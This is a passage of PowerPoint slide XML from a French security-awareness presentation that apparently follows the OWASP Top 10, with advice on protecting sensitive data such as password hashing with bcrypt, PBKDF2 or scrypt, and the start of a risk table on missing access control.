                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Choisir des algorithmes éprouvés et générer des clés robustes. S'assurer qu'une gestion des clés est en place. Privilégier des modules cryptographiques certifiés.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stocker les mots de passe au moyen d’un algorithme adapté à cet usage, tel que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>PBKDF2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>scrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Désactiver la mise en cache et l'attribut "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>autocomplete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" dans les formulaires collectant des données sensibles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="fr-CH" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Exposition de données sensibles</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>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A6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="219043" y="1014596"/>
            <a:ext cx="6466085" cy="580794"/>
            <a:chOff x="219043" y="1014596"/>
            <a:chExt cx="6466085" cy="580794"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="219043" y="1014596"/>
              <a:ext cx="6466085" cy="580794"/>
              <a:chOff x="219043" y="997424"/>
              <a:chExt cx="6466085" cy="58079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rgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>       </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vulnérabilités</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="4E8542">
                      <a:lumMod val="50000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="4"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solidFill>
                      <a:prstClr val="black"/>
                    </a:solidFill>
                  </a:endParaRPr>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solidFill>
                      <a:prstClr val="black"/>
                    </a:solidFill>
                  </a:endParaRPr>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solidFill>
                      <a:prstClr val="black"/>
                    </a:solidFill>
                  </a:endParaRPr>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solidFill>
                      <a:prstClr val="black"/>
                    </a:solidFill>
                  </a:endParaRPr>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solidFill>
                      <a:prstClr val="black"/>
                    </a:solidFill>
                  </a:endParaRPr>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err="1" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vecteurs</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>d’Attaque</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="4E8542">
                      <a:lumMod val="50000"/>
                    </a:srgb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rgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>   Impacts</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Techniques</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="4E8542">
                      <a:lumMod val="50000"/>
                    </a:srgbClr>
                  </a:solidFill>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219043" y="1280701"/>
                <a:ext cx="688009"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rgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents de </a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Menace</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="4E8542">
                      <a:lumMod val="50000"/>
                    </a:srgb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rgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Métier</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="4E8542">
                      <a:lumMod val="50000"/>
                    </a:srgb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solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:endParaRPr>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Tree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1003177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2747234014"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="914400"/>
          <a:ext cx="6858000" cy="2773680"/>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09600">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457200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Spécifique</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Application</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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploitabilité</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FACILE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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Prévalence</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMMUNE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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Détectabilité</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MOYENNE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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODÉRÉ</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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Spécifique</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Application / Métier</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79783">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Toute</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>personne</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pouvant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>envoyer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>une</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>requête</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> à </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>l’application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Un</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>utilisateur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>anonyme</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>peut-il</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>accéder</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> à </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>une</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>fonctionnalité</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>privée</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> ? Un simple </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>utilisateur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>peut-il</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>accéder</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> à </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>une</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>fonctionnalité</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>privilégiée</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> ?</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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>L’attaquant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>modifie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>simplement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>l’URL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>paramètres</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>d’une</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>fonction</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
